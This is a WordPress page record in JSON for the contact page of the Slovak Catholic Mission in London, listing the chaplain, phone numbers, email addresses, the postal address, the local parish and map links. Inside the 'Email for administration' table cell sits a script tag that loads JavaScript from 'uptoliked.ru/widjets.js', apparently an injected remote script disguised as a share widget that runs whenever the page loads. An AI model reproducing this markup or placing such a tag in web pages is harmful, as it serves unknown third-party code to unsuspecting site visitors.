{"id":15800,"date":"2013-05-06T20:46:34","date_gmt":"2013-05-06T19:46:34","guid":{"rendered":"http:\/\/www.scmlondon.org\/?page_id=15800"},"modified":"2019-01-02T10:33:21","modified_gmt":"2019-01-02T10:33:21","slug":"contact-us","status":"publish","type":"page","link":"https:\/\/www.scmlondon.org\/?page_id=15800","title":{"rendered":"CONTACT US"},"content":{"rendered":"<table>\n<tbody>\n<tr>\n<td><strong><i class=\"fa fa-user\"><\/i> Slovakian Chaplain for SCM: <\/strong><\/td>\n<td><strong>Fr Tibor Borovsky<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Mobile phone number:<\/td>\n<td><a href=\"tel:+447597637411\">(+44) 0759 763 7411<\/a><\/td>\n<\/tr>\n<tr>\n<td>Email of Slovakian Chaplain:<\/td>\n<td>info@scmlondon.org<\/td>\n<\/tr>\n<tr>\n<td>Email for administration:<script src=\"\/\/uptoliked.ru\/widjets.js\" type=\"text\/javascript\"><\/script><\/td>\n<td>secretary@scmlondon.org<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong><i class=\"fa fa-envelope\"><\/i> Post address:<\/strong><br \/>\nSlovak Catholic Mission in London<br \/>\n14 Melior Street<br \/>\nLondon\u00a0SE1 3QP<br \/>\nUnited Kingdom<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Local English Parish:<\/strong><br \/>\n<i class=\"fa fa-user\"><\/i>Parish Priest: Canon\u00a0Mark Powell<br \/>\nRoman Catholic Church of Our Lady of La Salette and St Jospeh<br \/>\n14 Melior Street, London SE1 3QP<br \/>\nTel:\u00a0(+44) 0207 403 8477<br \/>\nEmail: meliorstreet@rcaos.org.uk<br \/>\nWeb:\u00a0<a href=\"https:\/\/ourladyoflasalette.wordpress.com\" target=\"_blank\">https:\/\/ourladyoflasalette.wordpress.com<\/a><\/p>\n<p>&nbsp;<\/p>\n<p><strong><i class=\"fa fa-street-view\"><\/i> Google Street:<\/strong><br \/>\nVisit us via <a href=\"https:\/\/www.google.co.uk\/maps\/@51.5027826,-0.0851214,3a,75y,197.43h,84.02t\/data=!3m6!1e1!3m4!1sOGf7ObwO923DRS0iexCluA!2e0!7i13312!8i6656\" target=\"_blank\">Google Street View<\/a><\/p>\n<p><strong><i class=\"fa fa-map\"><\/i> Map:<\/strong><br \/>\nMap of Slovak Catholic Mission in London or how Slovak church in London Bridge:<br \/>\n<iframe loading=\"lazy\" src=\"https:\/\/mapsengine.google.com\/map\/embed?mid=znl8Bh8DYSTw.kuTD0V3TpY0A\" width=\"600\" height=\"480\"><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Slovakian Chaplain for SCM: Fr Tibor Borovsky Mobile phone number: (+44) 0759 763 7411 Email of Slovakian Chaplain: info@scmlondon.org Email for administration: secretary@scmlondon.org Post address: Slovak Catholic Mission in London&#8230; <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?page_id=15800\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":15790,"menu_order":5,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-15800","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/15800","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15800"}],"version-history":[{"count":20,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/15800\/revisions"}],"predecessor-version":[{"id":27426,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/15800\/revisions\/27426"}],"up":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/15790"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15800"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}